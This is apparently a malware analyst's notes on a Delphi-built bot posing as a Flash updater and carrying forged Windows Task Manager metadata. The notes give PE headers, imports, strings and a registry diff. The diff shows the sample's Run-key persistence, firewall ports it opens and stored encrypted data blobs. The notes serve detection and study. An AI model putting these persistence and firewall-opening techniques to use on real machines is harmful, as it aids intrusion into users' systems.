.rsrc   131072  8368    8704    3.36  210a8ec34d58b64a2531c59aa8344586
.reloc  143360  516     1024    3.94  1841b4a61bd8a2498e642d7a36c6d596

Compiled by: Borland Delphi 3.0
Compile Time: 2012-10-17 12:29:46
Packed entropy: Entropy 7.48782313568
Name: .text
Misc: 0x1A4D0
Misc_PhysicalAddress: 0x1A4D0
Misc_VirtualSize: 0x1A4D0
VirtualAddress: 0x1000
SizeOfRawData: 0x1A600
PointerToRawData: 0x400
PointerToRelocations: 0x0
PointerToLinenumbers: 0x0
NumberOfRelocations: 0x0
NumberOfLinenumbers: 0x0
Characteristics: 0x60000020

LangID: 040904B0
LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
InternalName: taskmgr
FileVersion: 5.00.2137.1
CompanyName: Microsoft Corporation
ProductName: Microsoft(R) Windows (R) 2000 Operating System
ProductVersion: 5.00.2137.1
FileDescription: Windows TaskManager
OriginalFilename: taskmgr.exe

------------------ imported calls DLL -------------------
0041EA0C GetCPInfo KERNEL32
0041EA10 VirtualAlloc KERNEL32
0041EA14 LoadLibraryA KERNEL32
0041EA18 GetProcAddress KERNEL32
0041EA1C GetWindowsDirectoryW KERNEL32
0041EA20 lstrcatW KERNEL32
0041EA24 CreateFileW KERNEL32
0041EA2C LoadIconA USER32
0041EA30 CreateIconIndirect USER32
0041EA34 GetDlgCtrlID USER32
0041EA38 GetScrollPos USER32
0041EA3C RegisterDeviceNotificationA USER32
0041EA40 DdeEnableCallback USER32
0041EA44 DrawStateA USER32
0041EA48 MessageBoxIndirectW USER32
0041EA4C LoadMenuA USER32
0041EA50 GetTabbedTextExtentA USER32
0041EA54 UnpackDDElParam USER32
0041EA58 DialogBoxIndirectParamW USER32
0041EA5C ToAsciiEx USER32
0041EA60 IsWindow USER32
0041EA64 LoadKeyboardLayoutA USER32
0041EA68 GetCursor USER32
0041EA6C UserHandleGrantAccess USER32
0041EA70 GetMenuState USER32
0041EA74 SetMenuItemInfoA USER32
0041EA78 TabbedTextOutW USER32
0041EA7C mouse_event USER32
0041EA80 DdeSetUserHandle USER32
0041EA84 SetWindowWord USER32
0041EA88 SetDlgItemTextW USER32
0041EA8C IsMenu USER32
0041EA90 SetWindowTextW USER32
0041EA94 GetSystemMenu USER32
0041EA98 RegisterClassA USER32
0041EA9C ChangeDisplaySettingsExW USER32
0041EAA0 SetMenuInfo USER32
0041EAA4 GetKeyState USER32
0041EAA8 ChildWindowFromPoint USER32
0041EAAC LoadCursorFromFileW USER32
0041EAB0 SendMessageCallbackA USER32
0041EAB4 DdeKeepStringHandle USER32
0041EAB8 FlashWindow USER32
0041EABC OpenIcon USER32
0041EAC0 CreateMenu USER32
0041EAC4 FindWindowW USER32
0041EAC8 GetIconInfo USER32
0041EACC GetWindowInfo USER32
0041EAD0 IsCharAlphaNumericA USER32
0041EAD4 FrameRect USER32
0041EAD8 FlashWindowEx USER32
0041EADC SetSysColors USER32
0041EAE0 GetCapture USER32
0041EAE4 DdeGetLastError USER32
0041EAE8 SetWindowsHookA USER32
0041EAEC PostThreadMessageA USER32
0041EAF0 TranslateMessage USER32
0041EAF4 GetDlgItemTextA USER32
0041EAF8 GetShellWindow USER32
0041EAFC CreateAcceleratorTableW USER32
0041EB00 DrawMenuBar USER32
0041EB04 DdeDisconnect USER32
0041EB08 SetClipboardData USER32
0041EB0C CreateDialogParamW USER32
0041EB10 ToUnicodeEx USER32
0041EB14 CreatePopupMenu USER32
0041EB18 IMPQueryIMEA USER32
0041EB1C CloseWindowStation USER32
0041EB20 GetGuiResources USER32
0041EB24 GetPropW USER32
0041EB28 SetActiveWindow USER32
0041EB2C CharNextExA USER32
0041EB30 IsRectEmpty USER32
0041EB34 LockSetForegroundWindow USER32
0041EB38 SetScrollRange USER32
0041EB3C EnumPropsExW USER32
0041EB40 PostMessageA USER32
0041EB44 GetClassInfoExW USER32
0041EB48 UpdateWindow USER32
0041EB4C GetFocus USER32
0041EB50 GetWindow USER32
0041EB54 PaintDesktop USER32
0041EB58 GetKeyboardLayout USER32
0041EB5C ChangeMenuA USER32
0041EB60 GetThreadDesktop USER32
0041EB64 CharLowerBuffW USER32
0041EB6C RegOpenKeyExW ADVAPI32

-------------- stringzzz --------------
.text:004157E4 00000013 C 3「H4j.JYb-菫ツ\n驟ヘ
.data:0041C02C 0000000C C CreateFileW
.data:0041C038 00000009 C
kernel32 .data:0041EB76 0000000A C GetCPInfo .data:0041EB82 0000000D C VirtualAlloc .data:0041EB92 0000000D C LoadLibraryA .data:0041EBA2 0000000F C GetProcAddress .data:0041EBB4 00000015 C GetWindowsDirectoryW .data:0041EBCC 00000009 C lstrcatW .data:0041EBD8 0000000C C CreateFileW .data:0041EBE4 0000000D C KERNEL32.dll .data:0041EBF4 0000000A C LoadIconA .data:0041EC00 00000013 C CreateIconIndirect .data:0041EC16 0000000D C GetDlgCtrlID .data:0041EC26 0000000D C GetScrollPos .data:0041EC36 0000001C C RegisterDeviceNotificationA .data:0041EC54 00000012 C DdeEnableCallback .data:0041EC68 0000000B C DrawStateA .data:0041EC76 00000014 C MessageBoxIndirectW .data:0041EC8C 0000000A C LoadMenuA .data:0041EC98 00000015 C GetTabbedTextExtentA .data:0041ECB0 00000010 C UnpackDDElParam .data:0041ECC2 00000018 C DialogBoxIndirectParamW .data:0041ECDC 0000000A C ToAsciiEx .data:0041ECE8 00000009 C IsWindow .data:0041ECF4 00000014 C LoadKeyboardLayoutA .data:0041ED0A 0000000A C GetCursor .data:0041ED16 00000016 C UserHandleGrantAccess .data:0041ED2E 0000000D C GetMenuState .data:0041ED3E 00000011 C SetMenuItemInfoA .data:0041ED52 0000000F C TabbedTextOutW .data:0041ED64 0000000C C mouse_event .data:0041ED72 00000011 C DdeSetUserHandle .data:0041ED86 0000000E C SetWindowWord .data:0041ED96 00000010 C SetDlgItemTextW .data:0041EDA8 00000007 C IsMenu .data:0041EDB2 0000000F C SetWindowTextW .data:0041EDC4 0000000E C GetSystemMenu .data:0041EDD4 0000000F C RegisterClassA .data:0041EDE6 00000019 C ChangeDisplaySettingsExW .data:0041EE02 0000000C C SetMenuInfo .data:0041EE10 0000000C C GetKeyState .data:0041EE1E 00000015 C ChildWindowFromPoint .data:0041EE36 00000014 C LoadCursorFromFileW .data:0041EE4C 00000015 C SendMessageCallbackA .data:0041EE64 00000014 C DdeKeepStringHandle .data:0041EE7A 0000000C C FlashWindow .data:0041EE88 00000009 C OpenIcon .data:0041EE94 0000000B C CreateMenu .data:0041EEA2 0000000C C FindWindowW .data:0041EEB0 0000000C C GetIconInfo .data:0041EEBE 
=====================
behavior check:
=====================
Self-deleting: it drops 1154656.exe (a copy of itself) as the payload and re-executes itself through a CMD command; see pic.
https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg

REGISTRY:

Note: this regshot diff was taken with the analysis tools running, so it also records Process Explorer (LEGACY_PROCEXP141, Software\Sysinternals), regshot.exe (the .hiv OpenWithList/OpenSaveMRU entries), WinRAR, Paint and the RecentDocs/UserAssist traces of the analyst's own actions; the UserAssist names are ROT13 (hcqngr_synfu_cynlre.rkr = update_flash_player.exe, cebprkc.rkr = procexp.exe). The entries to attribute to the sample are the Software\Microsoft\Sufyil key that holds the bot's data blobs, the Run value launching Application Data\Zeon\azys.exe, the GloballyOpenPorts firewall entries (24599:UDP, 14780:TCP) and the MUICache entries for the Temp executables whose description string is "Windows TaskManager".
----------------------------------
Keys added:26
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
----------------------------------
Values added:112
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet 
Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 
0x00000CC4 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC" HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb1: 7C 38 5B 8C F9 07 57 67 98 DF 13 61 02 BC EB 08 51 5E CB CC 76 AA D7 50 FE 83 D2 B6 EA 82 D3 DB 63 B8 8B 43 DC E2 C2 CB CC B6 70 ED 1C 61 08 D8 6A 7E A0 5D 57 FA DE C5 AF D7 91 F1 D2 AD 6B 2F A7 88 0B 28 97 70 54 63 34 38 6B 93 6F 61 8C 84 3F E7 95 23 5A BC 49 F9 A2 C1 C4 61 D9 31 F2 C9 2E E6 EF 1E 65 73 2A C2 5F 1A 9E C4 0D 99 CC AF 6D EE C4 77 65 CC 74 A5 BE 18 C3 1E 66 EA 09 47 A0 C2 80 26 69 BA A4 D3 8F C8 18 DB A9 
00 60 95 2D E7 C0 3B 7B 15 EC 06 01 62 0B BA 53 B7 F4 72 5A 61 3B 87 4F B4 84 5F B5 FF EB 7D A3 BF 6C 82 18 17 8A 58 A5 CC F6 0E 1E 8E 6C 10 3C 48 48 C7 DB AB 86 68 7A 58 22 A1 E1 BB 7B B5 10 D5 FB F8 37 90 90 A8 A6 C8 8A B0 90 0C 2C A5 9B BD 0B BE E2 2A 44 E3 10 07 C7 60 4E 16 C8 3A D8 08 C7 B8 C3 5A 5E 26 B3 D9 4B 93 8C 67 2B 32 DF F8 5D 42 BB 56 79 28 74 3D DD 9A 94 A4 D7 94 B0 D9 54 C7 F5 25 4C A7 DD 56 4D 9A 34 54 1E EE 04 A0 5D 6B F0 9A 85 67 C4 14 1B D1 F9 CB 97 B3 7D AD 83 0D 7A 26 3D DE 56 21 73 A3 F1 E3 AA 93 5D B2 3B BF 51 7C 98 EF AD 1B D6 0B 9D 36 22 F9 9E F8 8E 59 2F DD F2 F5 85 20 19 7C A5 40 E0 4B 21 A2 70 B5 6B C8 B0 B9 1C 47 3D DC 21 69 90 07 5B 9F AF 86 CA 75 6C 47 7C A5 D3 AF D5 4C 93 D0 A6 F5 F6 EB 2F D9 99 13 DD 6C 66 66 AE 7C 10 F8 D2 C1 66 E7 D5 75 3D 4D 2E 91 77 B4 20 A0 DA A2 A7 54 6C 22 B2 05 14 65 E2 74 36 1F 0D BA 3E DF 0D B9 71 A3 FE 2C 7D B3 A1 2C 17 4D 95 EC A4 99 DA C8 13 DE EE DA FE 75 E8 84 92 D1 22 4D 0B 88 66 67 C6 E1 1C 39 F1 26 0C 12 07 61 68 A0 87 6B BE 9A 4C 9D BB 82 F6 97 AB 39 AD 37 0D A6 1A 4A B0 9A 05 B1 6C 7A FD D5 1A 75 5A A4 F8 97 D6 82 93 5C 5D F2 D3 